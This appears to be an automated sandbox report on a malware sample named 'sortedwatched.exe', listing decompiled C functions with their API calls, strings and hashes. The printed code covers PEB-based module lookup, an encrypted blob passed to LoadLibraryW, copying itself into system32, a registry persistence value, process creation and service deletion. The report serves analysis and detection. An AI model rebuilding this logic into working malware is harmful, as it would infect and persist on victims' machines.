                  • Instruction Fuzzy Hash: 4FC1C271B04916ABCB18CE68C4907BAF7F1BF89304F04427ED659A7781D73CA855CB88
                  Uniqueness

                  Uniqueness Score: 0.00%

                  C-Code - Quality: 100%
                  			E004012CD(void* __ecx) {
                  				void* _t8;
                  				intOrPtr* _t12;
                  				intOrPtr* _t13;
                  
                  				_t8 = __ecx;
                  				_t12 =  *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc;
                  				_t13 =  *_t12;
                  				while(_t13 != _t12) {
                  					if(E00401161( *((intOrPtr*)(_t13 + 0x30))) == _t8) {
                  						return  *((intOrPtr*)(_t13 + 0x18));
                  					}
                  					_t13 =  *_t13;
                  				}
                  				return 0;
                  			}

                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c4bdfc313c746a2cb64b2d13bd71f69938b88e51a1103363138794cfe1d3b908
                  • Instruction ID: 7ecbe99e9aff7bbd4a6860067150bf6fe1a6c3b143e7c3a6fabfcc45b8fe1074
                  • Opcode Fuzzy Hash: c4bdfc313c746a2cb64b2d13bd71f69938b88e51a1103363138794cfe1d3b908
                  • Instruction Fuzzy Hash: EFE086333104508BC720DA99C480857F3F9EB84370B2908BFE546F7A61C338BC019688
                  Uniqueness

                  Uniqueness Score: 0.00%

                  C-Code - Quality: 100%
                  			E00401E04() {
                  
                  				return  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                  			}

                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 98b478bd1af69a2275d0ab39f1ac079ffe73a0c4551ec61df12d917ad4ecd62f
                  • Instruction ID: dd1ea78877d89c8c1f21003391c56dd86dd10fe21c56db2a52adb93900471d7c
                  • Opcode Fuzzy Hash: 98b478bd1af69a2275d0ab39f1ac079ffe73a0c4551ec61df12d917ad4ecd62f
                  • Instruction Fuzzy Hash: 8EA00275752980CFCE12CB09C394F9073F4F744B41F0504F1E80997A11C238A900CA00
                  Uniqueness

                  Uniqueness Score: 0.00%

                  C-Code - Quality: 82%
                  			E00409BFD(void* __eflags) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				intOrPtr _v20;
                  				intOrPtr _v24;
                  				intOrPtr _v28;
                  				intOrPtr _v32;
                  				intOrPtr _v36;
                  				intOrPtr _v40;
                  				intOrPtr _v44;
                  				intOrPtr _v48;
                  				intOrPtr _v52;
                  				intOrPtr _v56;
                  				intOrPtr _v60;
                  				intOrPtr _v64;
                  				intOrPtr _v68;
                  				intOrPtr _v72;
                  				intOrPtr _v76;
                  				intOrPtr _v80;
                  				intOrPtr _v84;
                  				intOrPtr _v88;
                  				intOrPtr _v92;
                  				intOrPtr _v96;
                  				intOrPtr _v100;
                  				intOrPtr _v104;
                  				intOrPtr _v108;
                  				intOrPtr _v112;
                  				intOrPtr _v116;
                  				intOrPtr _v120;
                  				intOrPtr _v124;
                  				intOrPtr _v128;
                  				intOrPtr _v132;
                  				intOrPtr _v136;
                  				intOrPtr _v140;
                  				intOrPtr _v144;
                  				intOrPtr _v148;
                  				intOrPtr _v152;
                  				intOrPtr _v156;
                  				intOrPtr _v160;
                  				intOrPtr _v164;
                  				intOrPtr _v168;
                  				intOrPtr _v172;
                  				intOrPtr _v176;
                  				intOrPtr _v180;
                  				intOrPtr _v184;
                  				intOrPtr _v188;
                  				intOrPtr _v192;
                  				intOrPtr _v196;
                  				intOrPtr _v200;
                  				intOrPtr _v204;
                  				intOrPtr _v208;
                  				intOrPtr _v212;
                  				intOrPtr _v216;
                  				intOrPtr _v220;
                  				intOrPtr _v224;
                  				intOrPtr _v228;
                  				intOrPtr _v232;
                  				intOrPtr _v236;
                  				intOrPtr _v240;
                  				intOrPtr _v244;
                  				intOrPtr _v248;
                  				intOrPtr _v252;
                  				intOrPtr _v256;
                  				intOrPtr _v260;
                  				intOrPtr _v264;
                  				intOrPtr _v268;
                  				intOrPtr _v272;
                  				intOrPtr _v276;
                  				intOrPtr _v280;
                  				intOrPtr _v284;
                  				intOrPtr _v288;
                  				intOrPtr _v292;
                  				intOrPtr _v296;
                  				intOrPtr _v300;
                  				intOrPtr _v304;
                  				intOrPtr _v308;
                  				intOrPtr _v312;
                  				intOrPtr _v316;
                  				intOrPtr _v320;
                  				intOrPtr _v324;
                  				intOrPtr _v328;
                  				intOrPtr _v332;
                  				intOrPtr _v336;
                  				intOrPtr _v340;
                  				intOrPtr _v344;
                  				intOrPtr _v348;
                  				intOrPtr _v352;
                  				intOrPtr _v356;
                  				intOrPtr _v360;
                  				intOrPtr _v364;
                  				intOrPtr _v368;
                  				intOrPtr _v372;
                  				intOrPtr _v376;
                  				intOrPtr _v380;
                  				intOrPtr _v384;
                  				intOrPtr _v388;
                  				intOrPtr _v392;
                  				intOrPtr _v396;
                  				intOrPtr _v400;
                  				intOrPtr _v404;
                  				intOrPtr _v408;
                  				intOrPtr _v412;
                  				intOrPtr _v416;
                  				intOrPtr _v420;
                  				intOrPtr _v424;
                  				intOrPtr _v428;
                  				intOrPtr _v432;
                  				intOrPtr _v436;
                  				intOrPtr _v440;
                  				intOrPtr _v444;
                  				intOrPtr _v448;
                  				intOrPtr _v452;
                  				intOrPtr _v456;
                  				intOrPtr _v460;
                  				intOrPtr _v464;
                  				intOrPtr _v468;
                  				intOrPtr _v472;
                  				intOrPtr _v476;
                  				intOrPtr _v480;
                  				intOrPtr _v484;
                  				intOrPtr _v488;
                  				intOrPtr _v492;
                  				intOrPtr _v496;
                  				intOrPtr _v500;
                  				intOrPtr _v504;
                  				intOrPtr _v508;
                  				intOrPtr _v512;
                  				intOrPtr _v516;
                  				intOrPtr _v520;
                  				intOrPtr _v524;
                  				intOrPtr _v528;
                  				intOrPtr _v532;
                  				intOrPtr _v536;
                  				intOrPtr _v540;
                  				intOrPtr _v544;
                  				intOrPtr _v548;
                  				intOrPtr _v552;
                  				intOrPtr _v556;
                  				intOrPtr _v560;
                  				intOrPtr _v564;
                  				intOrPtr _v568;
                  				intOrPtr _v572;
                  				intOrPtr _v576;
                  				intOrPtr _v580;
                  				intOrPtr _v584;
                  				intOrPtr _v588;
                  				intOrPtr _v592;
                  				intOrPtr _v596;
                  				intOrPtr _v600;
                  				intOrPtr _v604;
                  				intOrPtr _v608;
                  				intOrPtr _v612;
                  				intOrPtr _v616;
                  				intOrPtr _v620;
                  				intOrPtr _v624;
                  				intOrPtr _v628;
                  				intOrPtr _v632;
                  				intOrPtr _v636;
                  				intOrPtr _v640;
                  				intOrPtr _v644;
                  				intOrPtr _v648;
                  				intOrPtr _v652;
                  				intOrPtr _v656;
                  				intOrPtr _v660;
                  				intOrPtr _v664;
                  				intOrPtr _v668;
                  				intOrPtr _v672;
                  				intOrPtr _v676;
                  				intOrPtr _v680;
                  				intOrPtr _v684;
                  				intOrPtr _v688;
                  				intOrPtr _v692;
                  				intOrPtr _v696;
                  				intOrPtr _v700;
                  				char _v704;
                  
                  				_v704 = 0xf893fe23;
                  				_v700 = 0x96a93579;
                  				_v696 = 0x245c2aae;
                  				_v692 = 0xf26b8a8f;
                  				_v688 = 0x14c1b027;
                  				_v684 = 0xe0f0703e;
                  				_v680 = 0x88b3d872;
                  				_v676 = 0xa84285a9;
                  				_v672 = 0x47a43a6c;
                  				_v668 = 0xf852e92a;
                  				_v664 = 0xe5dfba2e;
                  				_v660 = 0xd7c59fdb;
                  				_v656 = 0xc3cbda99;
                  				_v652 = 0xcb41f718;
                  				_v648 = 0x6a64f5c4;
                  				_v644 = 0xdedf71d9;
                  				_v640 = 0xc4de6aec;
                  				_v636 = 0xfadcabb3;
                  				_v632 = 0x51f000a9;
                  				_v628 = 0x9adea939;
                  				_v624 = 0xb06b7dbe;
                  				_v620 = 0x2357ceb6;
                  				_v616 = 0x35749835;
                  				_v612 = 0x24a62c8;
                  				_v608 = 0x5593220e;
                  				_v604 = 0x3bac3701;
                  				_v600 = 0x3ed279c7;
                  				_v596 = 0xc38eec75;
                  				_v592 = 0xaa787b27;
                  				_v588 = 0xe66cbef7;
                  				_v584 = 0x3eba0d2d;
                  				_v580 = 0x80721929;
                  				_v576 = 0x647cf0de;
                  				_v572 = 0x6b060840;
                  				_v568 = 0xdb744423;
                  				_v564 = 0x56120815;
                  				_v560 = 0x16cc448e;
                  				_v556 = 0xaf1d3a70;
                  				_v552 = 0x84afcece;
                  				_v548 = 0x1f5b2bac;
                  				_v544 = 0x84987065;
                  				_v540 = 0x923c41c0;
                  				_v536 = 0x62b2d1f2;
                  				_v532 = 0x96e98167;
                  				_v528 = 0x6b9c643e;
                  				_v524 = 0x3bf32bb7;
                  				_v520 = 0x926b56ed;
                  				_v516 = 0xb2212760;
                  				_v512 = 0x3029804a;
                  				_v508 = 0x17afbdc1;
                  				_v504 = 0xe5215b81;
                  				_v500 = 0xa9a73174;
                  				_v496 = 0x38362969;
                  				_v492 = 0x2014a2e5;
                  				_v488 = 0x9bd1543c;
                  				_v484 = 0x9f02550a;
                  				_v480 = 0x70771f01;
                  				_v476 = 0xf57f7493;
                  				_v472 = 0xc2432019;
                  				_v468 = 0xfbc35934;
                  				_v464 = 0x7eef6c55;
                  				_v460 = 0xe5a1e850;
                  				_v456 = 0x95e16117;
                  				_v452 = 0x24148e16;
                  				_v448 = 0x7e86f567;
                  				_v444 = 0xd337dcd3;
                  				_v440 = 0xf1e0035b;
                  				_v436 = 0x7c2fa058;
                  				_v432 = 0xf68afb41;
                  				_v428 = 0xe89fcfb5;
                  				_v424 = 0x58132f2e;
                  				_v420 = 0xeb09708a;
                  				_v416 = 0x5042b9f5;
                  				_v412 = 0xa93c3553;
                  				_v408 = 0x5a85ccd8;
                  				_v404 = 0xad4d5cb9;
                  				_v400 = 0x72223e4b;
                  				_v396 = 0xa39693a8;
                  				_v392 = 0xef1aadfd;
                  				_v388 = 0x6cbdb06a;
                  				_v384 = 0xd7d937f8;
                  				_v380 = 0x596db643;
                  				_v376 = 0x230ce0c7;
                  				_v372 = 0x2d4bd8be;
                  				_v368 = 0xb37400f3;
                  				_v364 = 0x76b2403b;
                  				_v360 = 0xe15bf8ce;
                  				_v356 = 0xfc854871;
                  				_v352 = 0x6777c410;
                  				_v348 = 0xa6813d08;
                  				_v344 = 0x61441dae;
                  				_v340 = 0x7bc73fac;
                  				_v336 = 0xa81f123a;
                  				_v332 = 0x2f60e4b5;
                  				_v328 = 0x4165078e;
                  				_v324 = 0x81b3b60d;
                  				_v320 = 0x2f424b6a;
                  				_v316 = 0xe18acee1;
                  				_v312 = 0x40cb9f46;
                  				_v308 = 0xdcd07e81;
                  				_v304 = 0x77d948c4;
                  				_v300 = 0x8a50f65;
                  				_v296 = 0x69aaae5c;
                  				_v292 = 0x9aa1a84c;
                  				_v288 = 0x1177fe62;
                  				_v284 = 0x215e105a;
                  				_v280 = 0x568272bb;
                  				_v276 = 0x5f8f9ba2;
                  				_v272 = 0xae54d071;
                  				_v268 = 0x6814f89b;
                  				_v264 = 0x256969df;
                  				_v260 = 0x40871313;
                  				_v256 = 0x6ce1575a;
                  				_v252 = 0xbd3d788c;
                  				_v248 = 0x7ca8f87d;
                  				_v244 = 0x85fa53e6;
                  				_v240 = 0xd148325c;
                  				_v236 = 0x5e7ec80d;
                  				_v232 = 0xfdf502b7;
                  				_v228 = 0x2c986a2a;
                  				_v224 = 0xddbf220;
                  				_v220 = 0x4615f74b;
                  				_v216 = 0x5ca4c89f;
                  				_v212 = 0x146daa39;
                  				_v208 = 0xc823a9eb;
                  				_v204 = 0x367ea921;
                  				_v200 = 0xa498042b;
                  				_v196 = 0xca2acd0c;
                  				_v192 = 0xcac29f8f;
                  				_v188 = 0x581c0af8;
                  				_v184 = 0x54e383ca;
                  				_v180 = 0xe1d640da;
                  				_v176 = 0x26176d9b;
                  				_v172 = 0x44ba6c41;
                  				_v168 = 0xc7a769a8;
                  				_v164 = 0x14207816;
                  				_v160 = 0x60a483b3;
                  				_v156 = 0x2ec84207;
                  				_v152 = 0x55861a6c;
                  				_v148 = 0x9395ac55;
                  				_v144 = 0x7b3d468b;
                  				_v140 = 0xd742a34c;
                  				_v136 = 0xba1c8499;
                  				_v132 = 0xeedaef98;
                  				_v128 = 0x6fb05dd;
                  				_v124 = 0x51e8e4bc;
                  				_v120 = 0x78b88ff1;
                  				_v116 = 0xbd2f7124;
                  				_v112 = 0x56393da7;
                  				_v108 = 0xfe67bd5c;
                  				_v104 = 0x6bdb93e9;
                  				_v100 = 0xcd10dc31;
                  				_v96 = 0x10fa8214;
                  				_v92 = 0x66a75e2c;
                  				_v88 = 0xd4e5c57c;
                  				_v84 = 0xd9860dbd;
                  				_v80 = 0x6c05994b;
                  				_v76 = 0x3a6c9168;
                  				_v72 = 0x3ac0a209;
                  				_v68 = 0xeded3b06;
                  				_v64 = 0xc4e5c3d3;
                  				_v60 = 0x7666b774;
                  				_v56 = 0x18554a2e;
                  				_v52 = 0x9ba375a9;
                  				_v48 = 0x4225f3c7;
                  				_v44 = 0x59ee853;
                  				_v40 = 0xbef69b19;
                  				_v36 = 0x369b917b;
                  				_v32 = 0x5d702853;
                  				_v28 = 0x77e322b0;
                  				_v24 = 0x283b69ec;
                  				_v20 = 0x1e83f9c3;
                  				_v16 = 0xacacd89d;
                  				_v12 = 0x5dd1b9f2;
                  				_v8 = 0xedfd234e;
                  				_t186 = E00401A52(0x412360, 0x72fc3a35);
                  				 *0x4164f8 = LoadLibraryW(_t177);
                  				L00401B09(_t186);
                  				_push(0x415490);
                  				_push(0x6ae14ef1);
                  				return E004012FF( *0x4164f8,  &_v704, 0xaf);
                  			}

                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 0040A28F
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: K>"r$S(p]$Ul~$ZWl$i)68$jKB/$i;(
                  • API String ID: 1029625771-3790624641
                  • Opcode ID: 0a649403d8d360f2a31862833572a2dea479a68f40ac8d43144fbebdc44cd8d9
                  • Instruction ID: 14f22b25c2d513f9b0b165bc48c778ba0d1b191eebadfcd767fb7a1b2c45f88c
                  • Opcode Fuzzy Hash: 0a649403d8d360f2a31862833572a2dea479a68f40ac8d43144fbebdc44cd8d9
                  • Instruction Fuzzy Hash: 3FE196B4C06369CFDB618F86AA897CDBB70BB01704F6082C9C5993B215CB755AC6CF85
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 84%
                  			E0040F9DF() {
                  				void* _v8;
                  				char _v528;
                  				void* _t8;
                  				void* _t12;
                  				void* _t20;
                  				void* _t30;
                  				signed int _t31;
                  				void* _t33;
                  
                  				if( *0x415f4c == 0) {
                  					_t34 = E00401A52(0x4129d0, 0x4bf67e71);
                  					_t31 =  *0x4143a4( &_v528, 0x104, _t9, "C:\Windows\system32\sortedwatched.exe", _t30, _t33, _t20);
                  					_t12 = L00401B09(_t34);
                  					if(_t31 > 0) {
                  						_t36 = E00401A52(0x412be0, 0x4bf67e71);
                  						if(RegCreateKeyExW(0x80000001, _t13, 0, 0, 0, 2, 0,  &_v8, 0) == 0) {
                  							RegSetValueExW(_v8, "sortedwatched", 0, 1,  &_v528, 2 + _t31 * 2);
                  							RegCloseKey(_v8);
                  						}
                  						_t12 = L00401B09(_t36);
                  					}
                  					return _t12;
                  				}
                  				return _t8;
                  			}












                  APIs
                  • _snwprintf.NTDLL ref: 0040FA1D
                  • RegCreateKeyExW.ADVAPI32(80000001,00000000,00000000,00000000,00000000,00000002,00000000,0040C715,00000000), ref: 0040FA54
                  • RegSetValueExW.ADVAPI32(0040C715,sortedwatched,00000000,00000001,?,00000000), ref: 0040FA78
                  • RegCloseKey.ADVAPI32(0040C715), ref: 0040FA81
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseCreateValue_snwprintf
                  • String ID: C:\Windows\system32\sortedwatched.exe$g8Cw$sortedwatched
                  • API String ID: 1044119080-1568575355
                  • Opcode ID: 60bf88f92e863372fde177faa1f2e9ee41820f5811c66e19c34b9d099638a4c2
                  • Instruction ID: ae6d8057d6044da2fd1c6008afec86d0aa78eac3dd708c417e1b6433d3ba4775
                  • Opcode Fuzzy Hash: 60bf88f92e863372fde177faa1f2e9ee41820f5811c66e19c34b9d099638a4c2
                  • Instruction Fuzzy Hash: D211CC71700208BFD710AB959D85FEB776DDB44785F10407BF909E3191EB749D448AA8
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 87%
                  			E0040FB72(intOrPtr* __ecx, void* __edx, void* __eflags) {
                  				signed int _v8;
                  				void* _v20;
                  				void* _v24;
                  				char _v544;
                  				char _v1064;
                  				void* _t16;
                  				void* _t39;
                  
                  				_v8 = _v8 & 0x00000000;
                  				E0040FAA1( &_v544);
                  				_t16 = E0040F8E6( &_v544,  *__ecx,  *((intOrPtr*)(__ecx + 4)));
                  				if(_t16 != 0) {
                  					_t16 = E00401DCB( &_v8);
                  					if(_t16 != 0) {
                  						_t39 = E00401A52(0x412e50, 0x55009ce0);
                  						 *0x4143a4( &_v1064, 0x104, _t39,  &_v544);
                  						_t33 = _t39;
                  						L00401B09(_t39);
                  						if(E00401D2B( &_v1064, _t33, _v8,  &_v24) != 0) {
                  							CloseHandle(_v24);
                  							CloseHandle(_v20);
                  						}
                  						return CloseHandle(_v8);
                  					}
                  				}
                  				return _t16;
                  			}











                  APIs
                    • Part of subcall function 0040FAA1: lstrlenW.KERNEL32(?), ref: 0040FAB5
                    • Part of subcall function 0040FAA1: GetTickCount.KERNEL32 ref: 0040FAC5
                    • Part of subcall function 0040F8E6: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0040F900
                    • Part of subcall function 0040F8E6: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040F917
                    • Part of subcall function 0040F8E6: CloseHandle.KERNEL32(00000000), ref: 0040F920
                    • Part of subcall function 00401DCB: WTSGetActiveConsoleSessionId.KERNEL32 ref: 00401DD6
                    • Part of subcall function 00401DCB: CloseHandle.KERNEL32(00000000), ref: 00401DF6
                  • _snwprintf.NTDLL ref: 0040FBD3
                  • CloseHandle.KERNEL32(?), ref: 0040FC00
                  • CloseHandle.KERNEL32(?), ref: 0040FC09
                  • CloseHandle.KERNEL32(00000000), ref: 0040FC12
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseHandle$File$ActiveConsoleCountCreateSessionTickWrite_snwprintflstrlen
                  • String ID: g8Cw
                  • API String ID: 1860464474-3103284439
                  • Opcode ID: d21df1483eba43348c9a81eeec635097a7c991d75f1891da6298b92e764e64ff
                  • Instruction ID: aef8b5b249e02084cc47ae1663e45d8d954b77272b63b26d03dd396773520d47
                  • Opcode Fuzzy Hash: d21df1483eba43348c9a81eeec635097a7c991d75f1891da6298b92e764e64ff
                  • Instruction Fuzzy Hash: BA11867290011D9BDF21EB60DD05AEEB378EF44305F1044BAE905B21E1EB749F54CB98
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 100%
                  			E0040F63A(void* __ecx, void* __edx, void* __edi, void* __eflags) {
                  				short _v524;
                  				WCHAR* _t34;
                  
                  				_t34 = 0;
                  				E00401000();
                  				if(E0040108B(0x416c50, 0x416840) == 0) {
                  					E00401503( &_v524, 0x104);
                  					GetTempPathW(0x104,  &_v524);
                  					GetTempFileNameW( &_v524, 0, 0,  &_v524);
                  					if(E0040108B(0x416840,  &_v524) != 0) {
                  						_t34 = E0040108B(0x416c50, 0x416840);
                  						_t38 = _t34;
                  						if(_t34 == 0) {
                  							E0040108B( &_v524, 0x416840);
                  						}
                  					}
                  				}
                  				E004010DC(_t38);
                  				return _t34;
                  			}






                  APIs
                    • Part of subcall function 00401000: GetFileAttributesW.KERNEL32(?,00000000,00000000), ref: 00401047
                    • Part of subcall function 00401000: CreateDirectoryW.KERNEL32(?,00000000), ref: 0040105A
                    • Part of subcall function 00401000: GetLastError.KERNEL32 ref: 00401064
                    • Part of subcall function 0040108B: memset.NTDLL ref: 004010A0
                  • GetTempPathW.KERNEL32(00000104,?), ref: 0040F67C
                  • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 0040F68C
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileTemp$AttributesCreateDirectoryErrorLastNamePathmemset
                  • String ID: @hA$PlA$PlA
                  • API String ID: 9715921-2032501620
                  • Opcode ID: da8b0ef50ae2f127bfbd1831cbfe59f64a2b8a0fad9562421152777f72dc96db
                  • Instruction ID: 5d14a1be9669bfffb97e8a38806d051cd5262eb3adb47f349c5059f9eaae6cc3
                  • Opcode Fuzzy Hash: da8b0ef50ae2f127bfbd1831cbfe59f64a2b8a0fad9562421152777f72dc96db
                  • Instruction Fuzzy Hash: 7401AC31B0021417C72076658C459FB726D9F40355F00467BADC9E77B2EE39CD8687D8
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 61%
                  			E00401CC2(WCHAR* __ecx, WCHAR* __edx, intOrPtr _a8) {
                  				struct _PROCESS_INFORMATION _v20;
                  				struct _STARTUPINFOW _v88;
                  				void* _t22;
                  
                  				_t22 = 0x44;
                  				E00401503( &_v88, _t22);
                  				_v88.cb = 0x44;
                  				if(CreateProcessW(__ecx, __edx, 0, 0, 0, 0, 0, 0,  &_v88,  &_v20) == 0) {
                  					return 0;
                  				}
                  				if(_a8 == 0) {
                  					CloseHandle(_v20);
                  					CloseHandle(_v20.hThread);
                  				} else {
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  				}
                  				return 1;
                  			}







                  APIs
                  • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00401CF2
                  • CloseHandle.KERNEL32(?), ref: 00401D12
                  • CloseHandle.KERNEL32(0040F136), ref: 00401D1B
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseHandle$CreateProcess
                  • String ID: D$M vu
                  • API String ID: 2922976086-427032030
                  • Opcode ID: f759c0c4d4faa4ab7e3fcb7eaa698f336a99b085e6c1dbc9a5cb9a13423961d3
                  • Instruction ID: 78a74d64e74da198333939fe1c260d8d1ae2390c954a34ff9c8bd1b4990b218a
                  • Opcode Fuzzy Hash: f759c0c4d4faa4ab7e3fcb7eaa698f336a99b085e6c1dbc9a5cb9a13423961d3
                  • Instruction Fuzzy Hash: D7F0A472900108ABDB12DFA5DC04AEFB7BDEF45712B108036F916F71A0EB78AD058694
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 82%
                  			E0040F292() {
                  				void* _t3;
                  				void* _t7;
                  				void* _t10;
                  				void* _t15;
                  				void* _t18;
                  				void* _t19;
                  
                  				if( *0x415f4c == 0) {
                  					E0040F227();
                  				} else {
                  					E0040F214();
                  				}
                  				E00401503(0x416840, 0x104);
                  				_t3 = E00401A52(0x412bb0, 0x4bf67e71);
                  				_t19 = _t3;
                  				 *0x4143a4(0x416840, 0x104, _t19, "C:\Windows\system32", "sortedwatched", _t15, _t18, _t7);
                  				_t10 = _t19;
                  				return HeapFree(GetProcessHeap(), 0, _t10);
                  			}










                  APIs
                  • _snwprintf.NTDLL ref: 0040F2DB
                    • Part of subcall function 0040F214: SHGetFolderPathW.SHELL32(00000000,00000029,00000000,00000000,C:\Windows\system32), ref: 0040F220
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: FolderPath_snwprintf
                  • String ID: C:\Windows\system32$C:\Windows\system32\sortedwatched.exe$g8Cw$sortedwatched
                  • API String ID: 3078599568-3932404036
                  • Opcode ID: 732ce19849883ad6b6ae5baab8f4a74ee0b3467da4a84f7d802fc72968657f34
                  • Instruction ID: e972b69ea5731f996dd58b1a7c700a453acaa9277561cdf85d49239cb67cc4b6
                  • Opcode Fuzzy Hash: 732ce19849883ad6b6ae5baab8f4a74ee0b3467da4a84f7d802fc72968657f34
                  • Instruction Fuzzy Hash: D4E022203000106BC2207286AC457FB114ACBC2399B2180BFF90AB62D2CA7D8C06C37E
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 50%
                  			E0040F227() {
                  				void* _t3;
                  				void* _t8;
                  				void* _t10;
                  				void* _t13;
                  				void* _t14;
                  
                  				 *0x414c14(0, 0x1c, 0, 0, 0x416a48, _t10, _t13);
                  				_t3 = E00401A52(0x412df0, 0x4bf67e71);
                  				_t14 = _t3;
                  				 *0x4143a4(0x416a48, 0x104, _t14, 0x416a48, "sortedwatched");
                  				_t8 = _t14;
                  				return HeapFree(GetProcessHeap(), 0, _t8);
                  			}









                  APIs
                  • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,C:\Windows\system32), ref: 0040F236
                  • _snwprintf.NTDLL ref: 0040F25A
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: FolderPath_snwprintf
                  • String ID: C:\Windows\system32$g8Cw$sortedwatched
                  • API String ID: 3078599568-1150327775
                  • Opcode ID: 627380aad95ed75aaa38f20ecc9f6b9bc813d9b0073c6a6a7e394f29e60d905e
                  • Instruction ID: 86e21f4e142f409bbdd5896e6b5cbe9030aa6b7bc5bdc0fcc4a87da7cf4bd144
                  • Opcode Fuzzy Hash: 627380aad95ed75aaa38f20ecc9f6b9bc813d9b0073c6a6a7e394f29e60d905e
                  • Instruction Fuzzy Hash: 9FE0CD717401107BD31062656D09EF7695DDBD1FA1712403EBE0AE71D1E5748C41C27D
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 100%
                  			E0040F6D0(void* __ecx) {
                  				short _v524;
                  				signed short* _t12;
                  				void* _t15;
                  				void* _t19;
                  				signed short _t21;
                  				short* _t24;
                  				signed int _t25;
                  				void* _t26;
                  				short* _t27;
                  				void* _t28;
                  
                  				_t27 = 0;
                  				_t19 = __ecx;
                  				_t26 = 0;
                  				GetModuleFileNameW(0,  &_v524, 0x104);
                  				_t21 = _v524;
                  				_t12 =  &_v524;
                  				if(_t21 != 0) {
                  					_t25 = _t21 & 0x0000ffff;
                  					do {
                  						if(_t25 == 0x5c) {
                  							_t27 =  &(_t12[1]);
                  						}
                  						_t12 =  &(_t12[1]);
                  						_t25 =  *_t12 & 0x0000ffff;
                  					} while (_t25 != 0);
                  				}
                  				_t15 =  &(( &_v524)[lstrlenW( &_v524)]);
                  				while(_t15 >=  &_v524) {
                  					if( *_t15 == 0x2e) {
                  						_t26 = _t15;
                  					} else {
                  						_t15 = _t15 - 2;
                  						continue;
                  					}
                  					L11:
                  					if(_t27 != 0) {
                  						if(_t26 != 0) {
                  							 *_t26 = 0;
                  						}
                  						_t15 =  *_t27 & 0x0000ffff;
                  						_t24 = _t27;
                  						while(_t15 != 0) {
                  							if(_t15 >= 0x30 && _t15 <= 0x39) {
                  								_t24 =  &(_t24[1]);
                  								_t15 =  *_t24 & 0x0000ffff;
                  								continue;
                  							}
                  							goto L21;
                  						}
                  						_t15 = OpenServiceW(_t19, _t27, 0x10000);
                  						_t28 = _t15;
                  						if(_t28 != 0) {
                  							DeleteService(_t28);
                  							return CloseServiceHandle(_t28);
                  						}
                  					}
                  					L21:
                  					return _t15;
                  				}
                  				goto L11;
                  			}














                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 0040F6EF
                  • lstrlenW.KERNEL32(?), ref: 0040F725
